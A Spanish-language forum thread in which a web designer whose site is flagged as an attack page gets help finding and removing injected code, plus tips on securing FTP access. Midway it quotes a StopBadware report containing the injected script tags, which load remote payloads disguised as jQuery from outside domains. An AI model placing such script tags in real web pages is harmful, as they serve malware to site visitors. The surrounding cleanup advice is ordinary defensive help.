Pagina Web Atacante ?

Que tal amigos, hace dias que me sale un mensaje extraño en Mozilla y Chrome en mi pagina web. Ahora dicen que es una pagina web atacante !

Por supuesto yo como diseñador web se que es totalmente falso porque dentro del servidor solo hay HTML / JS DE LA PAGINA / CSS / PHP DE LOS FORMULARIOS / IMAGENES. Y el servidor está totalmente limpio de cosas extrañas. Cual es el problema?

puede ser que alguien te haya robado la clave ftp y modificara archivos sin tu consentimiento, revisa todos los archivos y solicita a google su revisión.

Es muy común este tipo de casos, donde aun cuando nosotros aseguramos que el sitio esta limpio no lo este, o incluso si enlazas a otro sitio mediante un iframe y este esta infectado puede afectar al tuyo.

jeje acabo de visitar el sitio, al hacer clic en ingnorar advertencia me envia a tu sitio pero de inmediato mi antivirus bloquea el contenido y me indica que ha detectado malware, en definitiva tienes código malicioso que debes limpiar.

Efectivamente ya revisé todo, incluso ya no hay nada en el servidor de momento.

He leido algun otro Foro y me encontré con que es posible que sea culpa de un Archivo que se crea automaticamente en el servidor llamado HTACCES o algo parecido.

Eso tendrá algo que ver? Aunque ya lo eliminé.

el archivo que mencionas no tiene ninguna relación con tu problema, ese archivo es utilizado para realizar ciertas configuraciones de PHP como re-escritura de url y re-direcciones 301

debe haber algo mas en tu código muchas veces lo incluyen como iframe, dentro algún js o php
si estas seguro de no tener nada en tu sitio, entra a tu webmaster tools de google y solicita vuelvan a revisar tu sitio.

Bueno ya yo limpié la pagina y de momento no hay nada, cuanto tarda google para volver a recargar su visita a la pagina y comprobar que no hay nada?

si tu haces la solicitud pueden ser unos cuantos días, si dejas que por si solo pase pueden ser semanas hasta un par de meses.

Hola que tal muchachos, ya la pagina StopBadware me envió un reporte diciendo que este es el codigo que esta mal en mi pagina:

<script type="text/javascript" src="http://sodiummetal.com/wp-content/plugins/wp_modx/jquery-1.6.5.min.php"></script><script type="text/javascript" src="http://www.thaiathome.fr/wp-content/plugins/wp_api/jquery-1.6.4.min.php"></script>

El Problema es que no lo consigo por ninguna parte.

usa textcrawler para buscar en todos los archivos, html, js, php.... etc etc.
no busques la linea completa, busca fragmentos puede estar dividido en secciones....

si no encuentras nada te tocara buscar archivo por archivo puede estar codificado en base64 u otro tipo por lo cual no lo podrás encontrar con aplicaciones.

y en ultima instancia puedes contratar a alguien para que lo haga por ti.

Bueno ya pude quitar el Script, fué colocado en las 20 Páginas o secciones que yo tenía. Ahora mi pregunta es: Como prevenir este tipo de cosas? Como puedo evitar que pase eso y proteger mi pagina web?

lo mas común es que tengan acceso FTP, lo mejor que puedes hacer es asegurarte que tu equipo este limpio, nunca usar el ftp en lugares públicos, cambiar la contraseña y usar al menos 10 caracteres alfanuméricos que incluya mayúsculas y minúsculas, si es posible agregar símbolos mejor aun.

también revisa los permisos de tus archivos... si sospechas que el servidor esta infectado, reportalo quizás el soporte técnico te pueda ayudar.

Me dijeron que podría ser un gestor FTP pirata. Yo utilizo el FileZilla, hay alguno mas confiable y seguro?

yo siempre he usado filezilla y nunca he tenido problemas, aunque ciertamente no es conveniente usar el administrador de ftp que incluye ya que no encripta las contraseñas y cualquiera puede tener acceso a ellas.

aquí te paso un articulo que te puede ayudar a mejorar la seguridad, si decides seguir usando filezilla.
-> clic aquí

Por cierto, si el problema ha sido por filezilla debes de pensar que no es completamente fallo de este, si no que alguien con acceso a tu PC aya ingresado con malas intenciones.... o bien tienes infectada tu PC por lo que requieres de manera inmediata desinfectar todo, ya que de poco servirá cambiarte a otro administrador FTP.

Alternativas gratuitas no conozco pero de paga esta FlashFXP, no es muy caro y el tiempo que lo use estuve muy agusto con el, yo lo deje porque me retire de la empresa donde trabajaba y no quise pagar la licencia en ese momento.

Si no tienes virus en tu comu dudo que sea lo que te dijeron. Se me hace que en el server les falló la seguridad.

Mi computadora no tiene Virus y mi computadora es solo de uso personal, nadie mas tiene acceso a ella.

Puede que sea culpa de la seguridad del servidor ya que una vez hackearon la pagina de un cliente importante y nadie tiene acceso al ftp o al servidor directamente, solo yo tengo acceso.